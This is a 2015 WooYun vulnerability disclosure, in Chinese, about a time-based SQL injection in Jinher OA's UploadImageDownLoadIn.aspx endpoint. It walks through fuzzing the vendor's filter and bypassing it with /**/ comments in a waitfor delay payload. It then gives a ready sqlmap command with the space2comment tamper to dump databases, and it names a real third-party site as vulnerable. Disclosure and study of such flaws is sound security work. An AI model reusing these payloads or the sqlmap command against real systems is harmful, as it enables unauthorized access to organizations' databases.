金和OA最新版再次通杀SQL注入（demo复现） | wooyun-2015-0132554

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0132554

漏洞标题：

金和OA最新版再次通杀SQL注入（demo复现）

2015-08-10：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-09-24：厂商已经主动忽略漏洞，细节向公众公开

金和OA最新版再次通杀SQL注入（demo复现）

官网：http://www.jinher.com
最新版demo：http://demos.jh0101.com/
老版本我曾经爆过存在这样一处注入，延时注入

UploadImageDownLoadIn.aspx?FileID=1

波及了海量的网站
金和官方修复了，加入了过滤
我们来看一下

http://demos.jh0101.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1'waitfor%20delay%20'0:0:3'

提交后显示：

进行fuzzing逐渐猜解过滤规则，定位关键字

http://demos.jh0101.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1'

正常提示，非单引号触发

http://demos.jh0101.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1'waitfor

正常提示，非单引号非waitfor触发

http://demos.jh0101.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1'waitfor%20delay%20

正常提示，非单引号非waitfor非delay触发

http://demos.jh0101.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1'waitfor%20delay%20'0:0:5'--

过滤注入，警告提示
找到规则定位点：

delay空格'0:0:5'--

猜想是delay后面匹配了空格，所以触发了过滤
尝试构造

<code>http://demos.jh0101.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1'waitfor%20delay/**/'0:0:5'--

</code>
成功延时，空格和delay的问题
修复非常不完善导致有一次绕过注入最新版本
SQLMAP下：

sqlmap -u "http://demos.jh0101.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1" --dbs --tamper space2comment.py --time-sec 2

成功得到结果：

对于升级到了最新版jinher的该处注入全部通杀
比如中航的oa等等：

http://bjoa.avic-intl.cn/